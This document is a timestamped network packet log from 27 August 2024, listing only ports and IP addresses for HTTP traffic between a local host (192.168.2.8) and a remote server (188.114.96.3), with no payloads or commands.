                                Aug 27, 2024 09:49:35.890487909 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.890502930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.890516043 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.890552998 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.890719891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.890886068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.890897989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.890908957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.890923023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.890930891 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.890934944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.890945911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.890953064 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.890959024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.890969992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.890979052 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.890983105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.890999079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891006947 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.891022921 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.891031027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891041994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891052008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891071081 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.891072035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891086102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891094923 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.891098022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891109943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891120911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891125917 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.891134024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891145945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891150951 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.891158104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891169071 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.891205072 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.891325951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891336918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891371012 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.891480923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891493082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891505957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891519070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891530991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891531944 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.891542912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891556025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891558886 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.891572952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891582012 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.891588926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891599894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891612053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891623974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891624928 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.891637087 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891652107 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.891670942 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.891851902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891864061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891875982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891892910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891906977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.891907930 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.891916990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.891952038 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.892143965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892162085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892173052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892184973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892196894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892208099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892208099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.892220020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892230988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.892231941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892247915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892247915 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.892260075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892277956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892288923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892299891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892313004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892329931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892330885 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.892343044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892354012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892359018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.892365932 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892378092 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.892385006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892398119 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892412901 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.892431974 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.892636061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892750025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892762899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892775059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892787933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892793894 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.892800093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892811060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892817974 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.892823935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892838001 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.892879963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892893076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892904043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892913103 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.892915964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892927885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892934084 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.892940044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892951965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892955065 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.892970085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892970085 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.892982006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.892998934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.893011093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.893018961 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.893023014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.893039942 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.893064976 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.893362999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.893374920 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.893385887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.893399000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.893412113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.893423080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.893424988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.893435955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.893444061 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.893450022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.893459082 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.893460035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.893485069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.945506096 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.977015018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977056026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977066994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977161884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977174997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977186918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977210999 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.977257013 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.977328062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977339983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977355957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977374077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977375031 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.977390051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977401018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977412939 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.977413893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977426052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977437973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977440119 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.977449894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977459908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977463007 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.977472067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977483034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977488041 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.977498055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977509022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977519989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977524996 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.977531910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977550030 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.977550983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977571964 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.977590084 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.977643013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977653980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977664948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977678061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977689028 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.977690935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977711916 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.977864981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977875948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977886915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977896929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977902889 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.977909088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977919102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977924109 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.977936983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977946997 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.977948904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977961063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.977983952 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.978003025 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.978182077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978199959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978210926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978224039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978235960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978246927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978250980 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.978257895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978271008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978282928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978295088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978332043 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.978353977 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.978503942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978516102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978526115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978537083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978549957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978562117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978574038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978584051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978598118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978607893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978621960 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.978646994 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.978826046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978837967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978847980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978859901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978873968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978883028 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.978884935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978898048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978900909 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.978914022 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.978919983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978931904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978940964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978951931 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.978952885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978966951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978977919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.978988886 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979000092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979011059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979022026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979033947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979043007 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.979046106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979063988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979068995 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.979099989 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.979396105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979408026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979424953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979437113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979448080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979465008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979475975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979486942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979499102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979511023 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.979511023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979523897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979535103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979541063 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.979546070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979562044 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.979577065 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.979938030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979949951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979960918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979973078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979990005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.979999065 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.980001926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.980014086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.980021000 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.980025053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.980036020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.980040073 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.980047941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.980056047 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.980060101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.980071068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.980074883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.980082035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.980093956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.980099916 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.980104923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.980117083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.980123043 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.980130911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.980142117 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.980143070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.980154991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.980178118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.980180979 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.980191946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.980199099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.980202913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.980226040 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.023597956 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.063952923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.063977957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.063988924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064053059 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.064074039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064085007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064096928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064110041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064124107 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.064222097 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.064308882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064320087 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064331055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064354897 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.064364910 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.064421892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064434052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064445019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064456940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064470053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064472914 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.064505100 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.064532042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064575911 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.064589024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064600945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064616919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064644098 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.064871073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064882994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064893961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064971924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064984083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.064986944 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.064994097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065006971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065010071 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.065020084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065026999 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.065052032 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.065226078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065237999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065248013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065265894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065280914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065291882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065304041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065316916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065330029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065337896 CEST4971580192.168.2.8188.114.96.3
